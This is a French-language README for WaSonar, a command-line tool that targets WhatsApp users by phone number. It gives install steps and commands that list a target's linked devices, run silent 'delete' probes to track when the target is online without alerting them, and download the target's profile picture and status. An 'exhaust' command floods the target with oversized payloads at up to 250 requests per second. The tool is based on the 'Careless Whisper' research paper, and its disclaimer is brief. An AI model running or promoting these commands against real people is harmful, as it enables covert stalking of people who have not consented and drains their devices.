
Outil de renseignement et d'épuisement des ressources pour WhatsApp. Fonctionnalités : suivi d'appareils en temps réel, sondage RTT silencieux et tests de stress du protocole pour la recherche en sécurité.
Avertissement : Cet outil est destiné uniquement à des fins éducatives et à la recherche en sécurité. Les développeurs ne sont pas responsables d'une mauvaise utilisation. Veuillez l'utiliser de manière responsable et éthique.
WaSonar est un outil CLI puissant conçu pour la recherche éducative, le suivi d'appareils et les tests de stress sur le protocole WhatsApp. Construit sur Baileys.
npm install -g wasonar-cli
npx wasonar-cli <command>
git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install
Tout d'abord, vous devez vous authentifier avec un compte WhatsApp.
wasonar-cli login
Scannez le code QR qui apparaît dans votre terminal.
Listez tous les appareils connectés à un numéro cible.
wasonar-cli devices <target-number>
# Example:
wasonar-cli devices 919876543210
La fonctionnalité principale. Envoyez des sondes silencieuses pour détecter si les appareils sont en ligne et mesurer la latence.
# Probe infinite times (default)
wasonar-cli online 919876543210
# Send specific number of probes
wasonar-cli online 919876543210 --probes 5
# Save results to file
wasonar-cli online 919876543210 --output ./logs
Note : PENDING/OFFLINE signifie que le serveur a reçu le message, mais que l'appareil cible n'a pas accusé réception.
Obtenez la photo de profil et le statut de l'utilisateur.
# Display info and download profile picture
wasonar-cli profile 919876543210 --output ./profiles
⚠️ POUR USAGE ÉDUCATIF UNIQUEMENT. Envoyez des payloads surdimensionnés à haute fréquence.
# Aggressive mode (Default: 250 req/s, 1KB payload)
wasonar-cli exhaust 919876543210
# Slow mode (10 req/s, 500B payload)
wasonar-cli exhaust 919876543210 --aggression slow
# Set duration
wasonar-cli exhaust 919876543210 --duration 30
WaSonar utilise des « sondes de suppression silencieuse » pour détecter le statut en ligne sans alerter la cible.
revoked (suppression) pour un ID de message inexistant.delivery_receipt (statut 3) pour le message de protocole.Basée sur la recherche « Careless Whisper », cette attaque exploite la lacune de validation dans le traitement des réactions de WhatsApp.
Bien que les réactions ne soient pas affichées sur le téléphone de la cible si elles sont invalides, elles sont quand même reçues et traitées.
Les données de recherche indiquent un potentiel significatif d'épuisement des ressources :
Basé sur les recherches de Gegenhuber et al., Université de Vienne & SBA Research :
@inproceedings{gegenhuber2024careless,
title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
year={2024},
organization={University of Vienna, SBA Research}
}
Créé par AjayAnto